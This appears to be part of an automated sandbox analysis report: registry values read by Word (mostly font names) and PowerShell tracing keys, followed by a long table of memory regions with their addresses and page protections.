||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F514B
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SavedLegacySettings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F514B
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
There are 327 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
250000
|
unkown
|
page execute and read and write
|
||
340000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page execute and read and write
|
||
80000
|
unkown
|
page execute and read and write
|
||
470000
|
unkown
|
page execute and read and write
|
||
430000
|
unkown
|
page execute and read and write
|
||
3365000
|
unkown
|
page read and write
|
||
238C000
|
unkown
|
page read and write
|
||
2FBC000
|
unkown
|
page read and write
|
||
4291000
|
unkown
|
page read and write
|
||
994000
|
unkown
|
page execute and read and write
|
||
289F000
|
unkown
|
page read and write
|
||
2B50000
|
heap private
|
page execute and read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
2890000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
2B90000
|
unkown
|
page read and write
|
||
1B40000
|
unkown
|
page readonly
|
||
3529000
|
unkown
|
page read and write
|
||
3519000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
313D000
|
unkown
|
page read and write
|
||
820000
|
unkown
|
page read and write
|
||
1E30000
|
heap private
|
page execute and read and write
|
||
29AE000
|
unkown
|
page read and write
|
||
AC60000
|
heap private
|
page read and write
|
||
CD73000
|
unkown
|
page read and write
|
||
6914000
|
unkown
|
page readonly
|
||
1C13000
|
heap private
|
page read and write
|
||
C230000
|
unkown
|
page read and write
|
||
7FF000D2000
|
unkown
|
page execute and read and write
|
||
428F000
|
unkown
|
page read and write
|
||
72F0000
|
heap private
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
1FF5000
|
heap private
|
page read and write
|
||
1B3AB000
|
unkown
|
page read and write
|
||
2F8A000
|
unkown
|
page read and write
|
||
3C7000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
632E000
|
unkown
|
page read and write
|
||
6FF000
|
unkown
|
page read and write
|
||
3068000
|
unkown
|
page read and write
|
||
244000
|
heap private
|
page read and write
|
||
1BA50000
|
unkown
|
page readonly
|
||
1C950000
|
unkown
|
page read and write
|
||
2A6A000
|
heap private
|
page execute and read and write
|
||
966B000
|
unkown
|
page readonly
|
||
420000
|
unkown
|
page read and write
|
||
2100000
|
unkown
|
page readonly
|
||
1C950000
|
unkown
|
page read and write
|
||
29E000
|
unkown
|
page read and write
|
||
1B6DD000
|
unkown
|
page read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
2D20000
|
unkown
|
page execute read
|
||
8632000
|
unkown
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
26E0000
|
unkown
|
page read and write
|
||
1BCB0000
|
heap private
|
page read and write
|
||
2F83000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page read and write
|
||
1B4A4000
|
unkown
|
page read and write
|
||
35C6000
|
unkown
|
page readonly
|
||
1F2B000
|
unkown
|
page readonly
|
||
2790000
|
unkown
|
page read and write
|
||
220000
|
heap private
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
7FF00250000
|
unkown
|
page read and write
|
||
10000
|
heap private
|
page read and write
|
||
3075000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
7FF000E5000
|
unkown
|
page read and write
|
||
610000
|
unkown
|
page read and write
|
||
2F2A000
|
unkown
|
page read and write
|
||
428C000
|
unkown
|
page read and write
|
||
4450000
|
unkown
|
page readonly
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
6F94000
|
heap private
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
26F0000
|
unkown
|
page readonly
|
||
400000
|
heap default
|
page read and write
|
||
A10000
|
unkown
|
page execute and read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
32C7000
|
unkown
|
page read and write
|
||
29AF000
|
unkown
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
30E8000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
356B000
|
unkown
|
page read and write
|
||
4B4000
|
heap default
|
page read and write
|
||
4F30000
|
unkown
|
page readonly
|
||
3132000
|
unkown
|
page read and write
|
||
353F000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page read and write
|
||
3555000
|
unkown
|
page readonly
|
||
16B000
|
unkown
|
page read and write
|
||
3542000
|
unkown
|
page read and write
|
||
39A5000
|
unkown
|
page read and write
|
||
2FD2000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
980000
|
unkown
|
page execute and read and write
|
||
2E4000
|
heap private
|
page read and write
|
||
3A17000
|
unkown
|
page read and write
|
||
D0000
|
heap private
|
page read and write
|
||
A3DF000
|
unkown
|
page write copy
|
||
3729000
|
unkown
|
page read and write
|
||
18A000
|
unkown
|
page execute and read and write
|
||
2260000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page read and write
|
||
2AE0000
|
unkown
|
page read and write
|
||
663000
|
unkown
|
page read and write
|
||
3137000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
2FCF000
|
unkown
|
page read and write
|
||
1CD000
|
unkown
|
page read and write
|
||
F8F000
|
unkown
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
315A000
|
unkown
|
page read and write
|
||
3357000
|
unkown
|
page read and write
|
||
2100000
|
unkown
|
page readonly
|
||
7FF000D2000
|
unkown
|
page execute and read and write
|
||
25D000
|
heap default
|
page read and write
|
||
470000
|
heap private
|
page read and write
|
||
F90000
|
unkown
|
page readonly
|
||
1C950000
|
unkown
|
page read and write
|
||
22E0000
|
heap private
|
page read and write
|
||
2690000
|
unkown
|
page readonly
|
||
66EF000
|
unkown
|
page readonly
|
||
3907000
|
unkown
|
page read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
8BCD000
|
unkown
|
page readonly
|
||
C8D8000
|
unkown
|
page read and write
|
||
27D000
|
unkown
|
page execute and read and write
|
||
9A0000
|
unkown
|
page execute and read and write
|
||
320000
|
unkown
|
page readonly
|
||
CD30000
|
unkown
|
page read and write
|
||
356C000
|
unkown
|
page read and write
|
||
1EF0000
|
unkown
|
page read and write
|
||
446000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
2F67000
|
unkown
|
page read and write
|
||
B2A4000
|
heap private
|
page read and write
|
||
2F19000
|
unkown
|
page read and write
|
||
2E5B000
|
unkown
|
page read and write
|
||
BD2000
|
unkown image
|
page execute and write copy
|
||
341A000
|
unkown
|
page read and write
|
||
1B44D000
|
unkown
|
page read and write
|
||
2CB0000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
7FF001B0000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
299000
|
heap default
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
1E80000
|
heap private
|
page execute and read and write
|
||
3B4F000
|
unkown
|
page read and write
|
||
BCF0000
|
heap private
|
page read and write
|
||
C8A5000
|
heap private
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
2270000
|
unkown
|
page readonly
|
||
27C4000
|
unkown
|
page read and write
|
||
5230000
|
unkown
|
page read and write
|
||
9F0000
|
unkown
|
page read and write
|
||
26D0000
|
unkown
|
page readonly
|
||
9F0000
|
unkown
|
page read and write
|
||
CB73000
|
unkown
|
page read and write
|
||
37D000
|
unkown
|
page execute and read and write
|
||
3B5B000
|
unkown
|
page read and write
|
||
1B47C000
|
unkown
|
page read and write
|
||
7FF000D0000
|
unkown
|
page read and write
|
||
35CA000
|
unkown
|
page read and write
|
||
2533000
|
unkown
|
page read and write
|
||
12DF1000
|
unkown
|
page read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
4520000
|
unkown
|
page readonly
|
||
2C60000
|
unkown
|
page read and write
|
||
3E27000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page read and write
|
||
2C6F000
|
unkown
|
page read and write
|
||
4295000
|
unkown
|
page read and write
|
||
C610000
|
unkown
|
page read and write
|
||
2DBF000
|
unkown
|
page read and write
|
||
BD2000
|
unkown image
|
page execute and write copy
|
||
7FF00010000
|
unkown
|
page read and write
|
||
7FF00140000
|
unkown
|
page read and write
|
||
3AEB000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
364000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
434000
|
heap default
|
page read and write
|
||
300000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
2B20000
|
unkown
|
page readonly
|
||
2C8000
|
heap default
|
page read and write
|
||
2E7B000
|
unkown
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
7AC0000
|
heap private
|
page read and write
|
||
260000
|
heap default
|
page read and write
|
||
3A42000
|
unkown
|
page read and write
|
||
26F0000
|
unkown
|
page readonly
|
||
25D000
|
heap default
|
page read and write
|
||
2D20000
|
unkown
|
page execute read
|
||
35B7000
|
unkown
|
page read and write
|
||
580000
|
unkown
|
page read and write
|
||
3C9000
|
heap default
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
2ED0000
|
unkown
|
page readonly
|
||
C6D2000
|
unkown
|
page read and write
|
||
1C90000
|
heap private
|
page execute and read and write
|
||
29DC000
|
unkown
|
page readonly
|
||
1BD30000
|
unkown
|
page read and write
|
||
A7E000
|
unkown
|
page read and write
|
||
2F11000
|
unkown
|
page read and write
|
||
30F0000
|
unkown
|
page read and write
|
||
1AC90000
|
unkown
|
page read and write
|
||
1AF0000
|
unkown
|
page read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
82DC000
|
unkown
|
page read and write
|
||
AAF0000
|
unkown
|
page write copy
|
||
300000
|
unkown
|
page read and write
|
||
1B910000
|
unkown
|
page write copy
|
||
34DE000
|
unkown
|
page read and write
|
||
50D000
|
unkown
|
page read and write
|
||
3695000
|
unkown
|
page readonly
|
||
2D0000
|
unkown
|
page read and write
|
||
34F4000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page read and write
|
||
2370000
|
unkown
|
page execute and read and write
|
||
F0000
|
unkown
|
page read and write
|
||
2C50000
|
unkown
|
page read and write
|
||
240000
|
heap private
|
page read and write
|
||
2EC2000
|
unkown
|
page read and write
|
||
3018000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page read and write
|
||
3596000
|
unkown
|
page readonly
|
||
6C0000
|
unkown
|
page readonly
|
||
2F1C000
|
unkown
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page write copy
|
||
3F9000
|
heap default
|
page read and write
|
||
3BB1000
|
unkown
|
page read and write
|
||
35E3000
|
unkown
|
page read and write
|
||
C94000
|
unkown image
|
page readonly
|
||
7490000
|
unkown
|
page write copy
|
||
35F9000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
1F00000
|
unkown
|
page readonly
|
||
4DD000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2F2F000
|
unkown
|
page read and write
|
||
2301000
|
unkown
|
page execute and read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
3860000
|
unkown
|
page readonly
|
||
3009000
|
unkown
|
page read and write
|
||
22FC000
|
unkown
|
page readonly
|
||
1F0C000
|
unkown
|
page readonly
|
||
A530000
|
unkown
|
page read and write
|
||
307E000
|
unkown
|
page read and write
|
||
3039000
|
unkown
|
page read and write
|
||
2FE4000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page read and write
|
||
2FFD000
|
unkown
|
page read and write
|
||
BD70000
|
unkown
|
page read and write
|
||
AFED000
|
unkown
|
page read and write
|
||
4AAE000
|
unkown
|
page read and write
|
||
300A000
|
unkown
|
page read and write
|
||
237E000
|
unkown
|
page read and write
|
||
355B000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
42C000
|
unkown
|
page read and write
|
||
3028000
|
unkown
|
page read and write
|
||
2EC0000
|
unkown
|
page readonly
|
||
2F9C000
|
unkown
|
page read and write
|
||
43C000
|
heap default
|
page read and write
|
||
8890000
|
unkown
|
page readonly
|
||
2FAE000
|
unkown
|
page read and write
|
||
2710000
|
heap private
|
page read and write
|
||
2EB0000
|
unkown
|
page read and write
|
||
3A6C000
|
unkown
|
page read and write
|
||
2B1A000
|
heap private
|
page execute and read and write
|
||
290000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
991000
|
unkown
|
page execute and read and write
|
||
B140000
|
unkown
|
page read and write
|
||
20FF000
|
unkown
|
page read and write
|
||
575000
|
heap default
|
page read and write
|
||
598000
|
unkown
|
page read and write
|
||
6FB3000
|
heap private
|
page read and write
|
||
3AF0000
|
unkown
|
page read and write
|
||
AFD0000
|
unkown
|
page read and write
|
||
3B79000
|
unkown
|
page read and write
|
||
2FE9000
|
unkown
|
page read and write
|
||
323000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page readonly
|
||
2187000
|
unkown
|
page execute and read and write
|
||
370000
|
unkown
|
page execute and read and write
|
||
2E90000
|
unkown
|
page read and write
|
||
1FF1000
|
unkown
|
page read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
3AA6000
|
unkown
|
page read and write
|
||
2A20000
|
unkown
|
page readonly
|
||
967E000
|
unkown
|
page readonly
|
||
310000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page read and write
|
||
2A8F000
|
unkown
|
page read and write
|
||
1B4F0000
|
unkown
|
page read and write
|
||
3366000
|
unkown
|
page read and write
|
||
35B5000
|
unkown
|
page readonly
|
||
7FF00200000
|
unkown
|
page execute and read and write
|
||
1C730000
|
unkown
|
page read and write
|
||
390F000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
7FF000D0000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
2184000
|
unkown
|
page execute and read and write
|
||
25A0000
|
unkown
|
page readonly
|
||
1B0000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
30C8000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page read and write
|
||
1C950000
|
unkown
|
page read and write
|
||
2E7E000
|
unkown
|
page read and write
|
||
27C0000
|
unkown
|
page read and write
|
||
437000
|
unkown
|
page read and write
|
||
968E000
|
unkown
|
page readonly
|
||
2BE0000
|
unkown
|
page readonly
|
||
596F000
|
unkown
|
page read and write
|
||
317C000
|
unkown
|
page read and write
|
||
7FF000E5000
|
unkown
|
page read and write
|
||
B5E000
|
unkown
|
page execute and read and write
|
||
C8D0000
|
unkown
|
page read and write
|
||
379A000
|
unkown
|
page read and write
|
||
1B43F000
|
unkown
|
page read and write
|
||
2FDA000
|
unkown
|
page read and write
|
||
3545000
|
unkown
|
page read and write
|
||
36E4000
|
unkown
|
page read and write
|
||
7FF00160000
|
unkown
|
page execute and read and write
|
||
ACE000
|
unkown
|
page read and write
|
||
2304000
|
unkown
|
page execute and read and write
|
||
1B5A000
|
unkown
|
page read and write
|
||
2F50000
|
unkown
|
page read and write
|
||
27A0000
|
unkown
|
page read and write
|
||
3A31000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
2A71000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
8C2A000
|
unkown
|
page readonly
|
||
2890000
|
unkown
|
page read and write
|
||
1BEF000
|
unkown
|
page read and write
|
||
3136000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page read and write
|
||
16E000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
424000
|
heap default
|
page read and write
|
||
1B61D000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
12EE2000
|
unkown
|
page read and write
|
||
3312000
|
unkown
|
page readonly
|
||
1BCF000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page readonly
|
||
800000
|
unkown
|
page execute and read and write
|
||
12C31000
|
unkown
|
page read and write
|
||
1E80000
|
unkown
|
page readonly
|
||
8662000
|
unkown
|
page read and write
|
||
3B40000
|
unkown
|
page readonly
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
4530000
|
heap private
|
page read and write
|
||
35FD000
|
unkown
|
page readonly
|
||
1B4F4000
|
unkown
|
page read and write
|
||
292F000
|
unkown
|
page read and write
|
||
36FD000
|
unkown
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
7150000
|
heap private
|
page read and write
|
||
20D0000
|
unkown
|
page readonly
|
||
2890000
|
unkown
|
page read and write
|
||
12F01000
|
unkown
|
page read and write
|
||
CA8000
|
unkown image
|
page readonly
|
||
2A50000
|
unkown
|
page readonly
|
||
1B9A000
|
unkown
|
page read and write
|
||
2D1F000
|
unkown
|
page read and write
|
||
2AFB000
|
unkown
|
page read and write
|
||
2DBF000
|
unkown
|
page read and write
|
||
1C60000
|
unkown
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page write copy
|
||
2E90000
|
unkown
|
page read and write
|
||
2CA0000
|
unkown
|
page read and write
|
||
285D000
|
unkown
|
page read and write
|
||
30B000
|
unkown
|
page read and write
|
||
1D7000
|
heap default
|
page read and write
|
||
303C000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
360000
|
heap private
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
6F90000
|
heap private
|
page read and write
|
||
3710000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
D4000
|
heap private
|
page read and write
|
||
2C50000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
82D0000
|
unkown
|
page read and write
|
||
1BD30000
|
unkown
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
3318000
|
unkown
|
page readonly
|
||
1B45D000
|
unkown
|
page read and write
|
||
2666000
|
unkown
|
page read and write
|
||
3102000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page readonly
|
||
2587000
|
unkown
|
page readonly
|
||
35F6000
|
unkown
|
page readonly
|
||
1E3B000
|
heap private
|
page read and write
|
||
35DC000
|
unkown
|
page read and write
|
||
27D7000
|
heap private
|
page read and write
|
||
2940000
|
unkown
|
page read and write
|
||
1F07000
|
unkown
|
page readonly
|
||
660000
|
unkown
|
page read and write
|
||
3120000
|
unkown
|
page read and write
|
||
28A0000
|
unkown
|
page readonly
|
||
3228000
|
unkown
|
page read and write
|
||
32AE000
|
unkown
|
page read and write
|
||
3548000
|
unkown
|
page read and write
|
||
3114000
|
unkown
|
page read and write
|
||
2FB0000
|
unkown
|
page read and write
|
||
BD0000
|
unkown image
|
page readonly
|
||
2AB4000
|
unkown
|
page read and write
|
||
2E2E000
|
unkown
|
page read and write
|
||
3318000
|
unkown
|
page readonly
|
||
9BCF000
|
unkown
|
page readonly
|
||
2B30000
|
unkown
|
page read and write
|
||
2B30000
|
unkown
|
page readonly
|
||
1C66000
|
unkown
|
page read and write
|
||
4196000
|
unkown
|
page read and write
|
||
7FF00012000
|
unkown
|
page execute and read and write
|
||
36FA000
|
unkown
|
page read and write
|
||
465F000
|
unkown
|
page read and write
|
||
2C2000
|
heap default
|
page read and write
|
||
A328000
|
unkown
|
page read and write
|
||
1B5D0000
|
unkown
|
page readonly
|
||
2E38000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page read and write
|
||
689E000
|
